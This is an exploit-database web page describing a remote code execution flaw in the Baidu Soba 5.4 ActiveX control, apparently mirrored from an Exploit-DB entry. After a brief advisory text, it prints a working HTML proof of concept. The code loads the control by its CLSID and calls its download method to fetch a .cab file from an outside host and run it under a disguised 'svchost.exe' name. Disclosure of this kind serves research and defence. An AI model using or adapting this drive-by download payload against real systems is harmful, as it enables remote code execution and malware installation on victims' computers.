Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Remote Code Execution in Baidu Soba ActiveX Control - exploit.company
header-logo
Suggest Exploit
vendor:
Baidu Soba
by:
Unknown
7.5
CVSS
HIGH
Remote Code Execution
Unknown
CWE
Product Name: Baidu Soba
Affected Version From: Baidu Soba 5.4
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Windows
Unknown

Remote Code Execution in Baidu Soba ActiveX Control

An attacker can exploit this issue to execute hostile code on a victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer). Successful exploits will allow attackers to execute arbitrary code with the privileges of the affected user; other consequences are possible.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25121/info

An ActiveX control installed with Baidu Soba search bar is prone to a remote code-execution vulnerability.

An attacker can exploit this issue to execute hostile code on a victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer). Successful exploits will allow attackers to execute arbitrary code with the privileges of the affected user; other consequences are possible.

This issue affects Baidu Soba 5.4; other versions may also be affected. 

<html>
<head>

<script>

function DowndloadCalcAndRun()
{

com.DloadDS("http://www.example.com/svcho st.cab", "svch ost.exe", 0);

}

</script>
</head>
<OBJECT ID = "com" CLASSID = "CLSID:{A7F05EE 4-0426-454F-8013-C41E 3596E9E9}">
</OBJECT>
<script>
DowndloadCalcAndRun()
</script>
</html>